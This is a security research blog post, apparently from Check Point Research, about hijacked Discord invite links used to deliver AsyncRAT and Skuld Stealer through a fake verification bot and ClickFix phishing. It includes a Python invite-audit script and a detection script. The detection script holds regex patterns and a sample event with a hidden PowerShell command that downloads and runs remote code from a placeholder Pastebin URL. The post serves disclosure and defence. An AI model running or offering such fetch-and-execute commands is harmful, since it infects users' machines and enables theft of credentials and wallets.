• Attackers took advantage of a Discord feature that lets expired or deleted invite links be reused, allowing them to hijack trusted community links and redirect users to harmful servers.
• The attack tricks users with a fake verification bot and phishing site that look like legitimate Discord servers, leading victims to unknowingly run harmful commands that download malware on their computer.
• The malware spreads quietly in multiple steps using popular, trusted services like GitHub and Pastebin to hide its activity and avoid detection.
• The attackers mainly target cryptocurrency users and aim to make money by stealing credentials and wallet information from victims around the world. Over 1,300 downloads were tracked, with victims spanning multiple countries including the U.S., Vietnam, France, Germany, the UK, and more, highlighting the global scale and financial motivation behind the campaign.

Introduction

Discord is a widely used and trusted platform favored by gamers, communities, businesses, and others who need to connect securely and quickly. In our recent research, Check Point Research (CPR) uncovered a flaw in Discord’s invitation system that allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers. Invitation links posted by trusted communities months ago on forums, social media, or official websites could now quietly lead users into the hands of cyber criminals.

CPR observed real-world attacks in which threat actors leveraged hijacked links to deploy sophisticated phishing schemes and malware campaigns. These included multi-stage infections that evaded detection by antivirus tools and sandbox checks, ultimately delivering malware like AsyncRAT and Skuld Stealer. This blog will detail the attack and share practical tips to remain protected from such attacks.

For in-depth technical details, see our full research report.

The Hidden Risk in Discord Invite Links

Discord offers several types of invite links: temporary, permanent, and vanity (custom) links. Temporary links expire after a set time, permanent links never expire, and vanity links are custom URLs available only to servers with premium (Level 3 Boost) status.

Our investigation revealed that attackers can exploit the way Discord manages expired or deleted invite codes—especially vanity links. When a custom invite link expires or a server loses its boosted status, the invite code can become available again. Attackers can then claim the same code and redirect users to a malicious server.

In many cases, users encounter these links in old, trusted sources and have no reason to suspect anything is wrong. To make things worse, the Discord app sometimes gives users the false impression that temporary links have been made permanent, which contributes to the pool of hijackable codes.
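The check a server owner or community moderator can run over invite codes they once published, as an added example (not Check Point's tooling): resolve each code against Discord's public invite endpoint and compare the guild it now points to with the guild it was published for, flagging codes that no longer resolve (and are therefore free to be re-claimed), codes that now resolve to a different guild, and codes that are only temporary. The endpoint and the "Unknown Invite" error code are Discord's; the JSON bodies and guild ids below are constructed samples.

```python
"""Audit published Discord invite codes for the hijack conditions described above.

Added example (not Check Point's tooling). The JSON bodies are constructed
samples shaped like Discord's public GET /invites/{code} responses.
"""
import json
import urllib.error
import urllib.request

INVITE_API = "https://discord.com/api/v10/invites/{code}"
UNKNOWN_INVITE = 10006  # Discord JSON error code: the invite no longer exists


def classify_invite(expected_guild_id: str, body: dict) -> str:
    """Return one of 'ok', 'temporary', 'expired', 'hijacked'."""
    if body.get("code") == UNKNOWN_INVITE:
        # Resolves to nothing: an expired vanity code in this state is
        # exactly what an attacker can re-claim for a malicious server.
        return "expired"
    guild = body.get("guild") or {}
    if guild.get("id") != expected_guild_id:
        # Same code, different guild: the link has been taken over.
        return "hijacked"
    if body.get("expires_at"):
        # Still yours but time-limited: do not leave it in durable posts.
        return "temporary"
    return "ok"


def fetch_invite(code: str) -> dict:
    """Live lookup (needs network); HTTP error bodies are returned, not raised."""
    req = urllib.request.Request(INVITE_API.format(code=code), headers={"User-Agent": "invite-audit"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        return json.load(err)


def audit(published: dict, responses: dict) -> dict:
    """published: code -> guild id you own; responses: code -> API body."""
    return {c: classify_invite(g, responses[c]) for c, g in published.items()}


# Constructed sample responses for three codes once posted for guild 111.
SAMPLES = {
    "ourguild": {"code": "ourguild", "guild": {"id": "111", "name": "Our Community"}, "expires_at": None},
    "oldpromo": {"code": "oldpromo", "guild": {"id": "999", "name": "Verify Here"}, "expires_at": None},
    "gonecode": {"message": "Unknown Invite", "code": 10006},
}
PUBLISHED = {"ourguild": "111", "oldpromo": "111", "gonecode": "111"}
```

Against live data, replace `SAMPLES[c]` with `fetch_invite(c)` for each published code; any result other than `ok` is a link to take down or replace.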

From Trusted Links to Malicious Servers

Once an invite link is hijacked, attackers redirect users to malicious servers that mimic legitimate Discord ones. Newcomers typically find that most channels are locked, except for one called “verify.” Here, a fake bot named “Safeguard” prompts users to complete a verification step.

Malicious Discord server where users land after clicking a hijacked invite link.

Clicking “verify” initiates an OAuth2 flow and redirects users to a phishing site that closely resembles Discord. The site preloads a malicious PowerShell command to the clipboard and guides users through a fake verification process. This technique, known as “ClickFix,” tricks users into running the command via the Windows Run dialog.

Once executed, the PowerShell script downloads additional components from Pastebin and GitHub, initiating a multi-stage infection chain. Ultimately, the system is infected with payloads including AsyncRAT, which gives attackers remote control, and Skuld Stealer, which targets browser credentials and cryptocurrency wallets.
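Detection logic for the launch step just described, as an added example (not code from the Check Point report): it scores process-creation events for PowerShell spawned by explorer.exe (how a command pasted into the Run dialog starts) combined with a download from one of the staging services named in this post. The Sysmon-style events, field names and placeholder URL are constructed; the host list is an assumption drawn from the services this post mentions.

```python
"""Flag ClickFix-style PowerShell launches in process-creation telemetry.

Added example, not from the Check Point report. Events are constructed
Sysmon-style records, not captured logs.
"""
import re

# Services the campaign staged payloads on; extend for your environment.
STAGING_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com", "bitbucket.org")
DOWNLOAD_CMDLETS = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EVASION_FLAGS = re.compile(
    r"(\biex\b|invoke-expression|\s-enc\w*\s|-w(indowstyle)?\s+hidden|-nop\b)", re.I)


def score_event(ev: dict) -> list:
    """Return the indicators matched by one process-creation event."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return hits
    if ev.get("ParentImage", "").lower().endswith("explorer.exe"):
        hits.append("spawned_by_explorer")   # Run dialog / ClickFix launch pattern
    if any(h in cmd.lower() for h in STAGING_HOSTS):
        hits.append("staging_host")
    if DOWNLOAD_CMDLETS.search(cmd):
        hits.append("download_cmdlet")
    if EVASION_FLAGS.search(cmd):
        hits.append("evasion_flags")
    return hits


def is_suspicious(ev: dict) -> bool:
    """Alert on a staging-host fetch combined with at least two other traits."""
    hits = score_event(ev)
    return "staging_host" in hits and len(hits) >= 3


def triage(events: list) -> list:
    """Command lines of the events worth an analyst's attention."""
    return [e["CommandLine"] for e in events if is_suspicious(e)]


# Constructed sample events (placeholder URL, not a real paste).
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://pastebin.com/raw/EXAMPLE).Content"'},
    {"Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pwsh -File C:\scripts\backup.ps1"},
]
```

A lone `spawned_by_explorer` hit is normal user activity; the alert fires only when the staging-host fetch coincides with the other traits.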

Infection chain overview: From PowerShell to final malware payload delivery.

An Expanding and Evolving Campaign

This campaign isn’t static. We’ve seen attackers periodically update their downloader to maintain a zero-detection rate on VirusTotal. We also identified a parallel campaign targeting gamers. Here, the initial loader was embedded in a Trojanized cheat tool for The Sims 4, demonstrating the attackers’ flexibility in targeting different user groups.

Impact and Reach

Exact victim counts are hard to determine due to the stealthy use of Discord webhooks for data exfiltration. However, download stats from repositories used in the campaign show over 1,300 downloads. Victims were spread across the globe, including in the U.S., Vietnam, France, Germany, the UK, and other countries.

The focus on stealing credentials and crypto wallet data indicates a clear financial motivation behind the attack.

A Trusted Platform Turned Attack Vector

This campaign illustrates how a subtle feature of Discord’s invite system can be weaponized. By hijacking trusted links, attackers created an effective attack chain that combined social engineering with abuse of legitimate services like GitHub, Bitbucket, and Pastebin.

Instead of using heavy obfuscation, the threat actors relied on simpler, stealthier techniques like behavior-based execution, scheduled tasks, and delayed payload decryption.

This campaign highlights the increasing sophistication of social engineering attacks that hijack user trust. Rather than relying on heavily obfuscated malware, attackers used legitimate services and simple behavioral tricks to evade detection, showing just how easily popular platforms can be manipulated when basic features—like invite link handling—are left unsecured.

Discord has since disabled the malicious bot used in this campaign, but the core tactics remain viable. Attackers can easily register new bots or switch vectors while continuing to exploit the invite system.

Stay Protected
  1. Double-check invite links – Always inspect Discord invite URLs before clicking. If a link comes from an old source (e.g., a forum post or tweet), verify its legitimacy first.
  2. Favor permanent invite links – When managing your own Discord servers, generate permanent (never-expiring) invite links. Avoid posting temporary invites publicly.
  3. Check the “Verified App” badge before authorizing bots – Only interact with bots that display Discord’s official “Verified App” badge. Unverified bots may be malicious.
  4. Never run unknown commands – No legitimate Discord server or verification process should require you to run PowerShell commands or paste anything into your system terminal. Stop and investigate if prompted to do so.
  5. Adopt layered defenses – For organizations, combine security awareness training with endpoint protection, phishing detection, and browser security tools that can stop threats before they execute.
  6. Leverage proactive protection – Check Point Threat Emulation provides real-time prevention against advanced malware, phishing tactics, and file-based threats like the ones used in this campaign—across web, email, and collaboration tools. Its behavioral analysis and sandboxing capabilities offer critical protection against evolving social engineering and multi-stage malware attacks.
